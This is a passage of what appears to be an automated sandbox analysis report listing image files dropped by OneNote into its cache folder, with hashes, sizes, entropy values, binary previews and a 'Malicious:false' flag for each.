                                                                                                                                            SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                            MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                            SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                            SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                            SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12654
                                                                                                                                            Entropy (8bit):7.745439197485533
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                            MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                            SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                            SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                            SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2695
                                                                                                                                            Entropy (8bit):7.434963358385164
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                            MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                            SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                            SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                            SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11040
                                                                                                                                            Entropy (8bit):7.929583162638891
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                            MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                            SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                            SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                            SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2268
                                                                                                                                            Entropy (8bit):7.384274251000273
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                            MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                            SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                            SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                            SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):784
                                                                                                                                            Entropy (8bit):6.962539208465222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                            MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                            SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                            SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                            SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3009
                                                                                                                                            Entropy (8bit):7.493528353751471
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                            MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                            SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                            SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                            SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2266
                                                                                                                                            Entropy (8bit):5.563021222358941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                            MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                            SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                            SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                            SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):99293
                                                                                                                                            Entropy (8bit):7.9690121496708555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                            MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                            SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                            SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                            SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2898
                                                                                                                                            Entropy (8bit):7.551512280854713
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                            MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                            SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                            SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                            SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29187
                                                                                                                                            Entropy (8bit):7.971308326749753
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                            MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                            SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                            SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                            SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4819
                                                                                                                                            Entropy (8bit):7.874649683222419
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                            MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                            SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                            SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                            SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1717
                                                                                                                                            Entropy (8bit):7.154087739587035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                            MD5:943371B39CA847674998535110462220
                                                                                                                                            SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                            SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                            SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3555
                                                                                                                                            Entropy (8bit):7.686253071499049
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                            MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                            SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                            SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                            SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                            Malicious:false
